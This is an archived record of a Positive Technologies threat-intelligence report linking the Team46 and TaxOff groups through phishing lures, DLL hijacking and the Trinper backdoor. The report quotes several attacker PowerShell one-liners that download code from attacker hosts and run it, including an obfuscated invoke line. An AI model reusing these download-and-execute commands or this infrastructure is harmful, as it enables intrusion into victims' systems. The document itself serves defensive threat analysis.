{
	"id": "ee5ee2db-f6c1-4c7a-aea5-e5bdae6ae27b",
	"created_at": "2026-04-06T00:15:51.397611Z",
	"updated_at": "2026-04-10T13:11:28.01361Z",
	"deleted_at": null,
	"sha1_hash": "bb9adfde4b396310a8b402b33c22a8741fa47d09",
	"title": "Team46 and TaxOff: two sides of the same coin",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 849455,
	"plain_text": "Team46 and TaxOff: two sides of the same coin\r\nBy Positive Technologies\r\nPublished: 2025-06-16 · Archived: 2026-04-05 14:23:20 UTC\r\nThe attack that caught the attention of experts occurred in mid-March 2025. The initial attack vector was\r\na phishing email containing a malicious link. When the victim clicked the link, it triggered a one-click exploit\r\n(CVE-2025-2783), leading to the installation of the Trinper backdoor employed by TaxOff. The phishing email\r\nwas disguised as an invitation to the Primakov Readings forum and the link led to a fake website hosting\r\nthe exploit. The text of the email can be found in the Kaspersky report.\r\nDuring the investigation of that attack, another attack, dating back to October 2024, was discovered, which also\r\nbegan with a phishing campaign. The malicious emails contained an invitation to participate in an international\r\nconference called \"Security of the Union State in the modern world.\"\r\nFigure 1. Decoy document used in the October 2024 attack\r\nThe email structure and style are very similar to those observed in the March 2025 attack.\r\nThe October 2024 email contains the following link: https://mil-by[.]info/#/i?id=[REDACTED]. Clicking\r\nthe link downloads an archive with a shortcut that launches powershell.exe with this command:\r\n-w minimized -c irm https://ms-appdata-query.global.ssl.fastly.net/query.php?id=[REDACTED] | iex\r\nEarlier, we saw a similar command in Team46 attacks:\r\n-w Minimized -ep Bypass -nop -c \"irm https://infosecteam.info/other.php?id=jdcz7vyqdoadr31gejeivo6g30cx7kgu | i\r\nThe PowerShell script downloaded after the execution of the command is also similar to one of the scripts used\r\nby Team46. 
Here is what the downloaded script looks like:\r\nhttps://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/team46-and-taxoff-two-sides-of-the-same-coin\r\nPage 1 of 4\n\npowershell.exe -w minimized -ep bypass -noni -nop -c Invoke-Expression $([char](10+0x18+0x2)+[char](100)+[char]\r\n[REDACTED]\r\nAfter deobfuscation, the script appears as follows:\r\niwr 'https://ms-appdata-fonts.global.ssl.fastly.net/docs/minsk2025v1/[REDACTED]/document.pdf' -OutFile $env:LOC\r\nFor comparison, here is a similar script found in a Team46 attack:\r\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -w Minimized -ep Bypass -nop -c \"iwr 'https://srv4801\r\nAs you can see, the same pattern is used to name the decoy document on the victim's computer (umawbfez-bkw5-f85a-3idl-3z4ql69v8it0.pdf and 399ha122-tt9d-6f14-s9li-lqw7di42c792.pdf). In both cases, the Edge User-Agent is used when downloading the decoy document, and the Yandex Browser User-Agent is used when\r\ndownloading the payload. Moreover, in both cases, the computer name is passed via the query parameter.\r\nThe only real difference between those two cases is the payload. The earlier attack, as described by Dr.Web, exploited\r\na DLL hijacking vulnerability in Yandex Browser (CVE-2024-6473), with the adversaries replacing\r\nthe legitimate Wldp.dll library to launch the malicious payload. In the October 2024 attack, the adversaries\r\nexploited the rdpclip.exe system component, which is also vulnerable to DLL hijacking, and replaced\r\nthe winsta.dll system library.\r\nInterestingly, winsta.dll serves as a loader for the Trinper backdoor employed by the TaxOff group, which\r\nwe described earlier. 
The backdoor used the common-rdp-front.global.ssl.fastly.net C2 server.\r\nThis could be dismissed as a coincidence if it weren't for a similar attack recorded in September 2024.\r\nThe phishing emails sent out by the attackers contained an archive called Корпоративного Центра\r\nПАО «Ростелеком».zip, which included a shortcut called Ростелеком.pdf.lnk that launched powershell.exe\r\nwith a command typical for Team46:\r\n-w hid -ep Bypass -nop -c \"irm https://srv510786.hstgr.cloud/ordinary.php?id=9826fbb409f65dc6b068b085551bf4f3\r\nThe decoy document used in the attack was disguised as a message from Rostelecom, Russia's largest digital\r\nservice provider, notifying of upcoming maintenance outages.\r\nFigure 2. Decoy document used in the September 2024 attack\r\nThe phone number at the end of the message is in the Team46 style (which we discussed in our earlier article):\r\nit is incorrect and consists of a random sequence of digits.\r\nThe payload in this attack was the AdobeARM.exe file, which happens to be a loader for the backdoor used\r\nin the first known Team46 attack described by Dr.Web. In fact, when analyzing one of the incidents,\r\nwe discovered this backdoor, also dubbed AdobeARM.exe, on a system with the Trinper backdoor.\r\nSource: https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/team46-and-taxoff-two-sides-of-the-same-coin",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/team46-and-taxoff-two-sides-of-the-same-coin"
	],
	"report_names": [
		"team46-and-taxoff-two-sides-of-the-same-coin"
	],
	"threat_actors": [
		{
			"id": "17e10d0c-1e0d-46ae-b618-e38257652da1",
			"created_at": "2026-02-04T02:00:03.706015Z",
			"updated_at": "2026-04-10T02:00:03.949251Z",
			"deleted_at": null,
			"main_name": "Team46",
			"aliases": [
				"TaxOff"
			],
			"source_name": "MISPGALAXY:Team46",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434551,
	"ts_updated_at": 1775826688,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bb9adfde4b396310a8b402b33c22a8741fa47d09.pdf",
		"text": "https://archive.orkl.eu/bb9adfde4b396310a8b402b33c22a8741fa47d09.txt",
		"img": "https://archive.orkl.eu/bb9adfde4b396310a8b402b33c22a8741fa47d09.jpg"
	}
}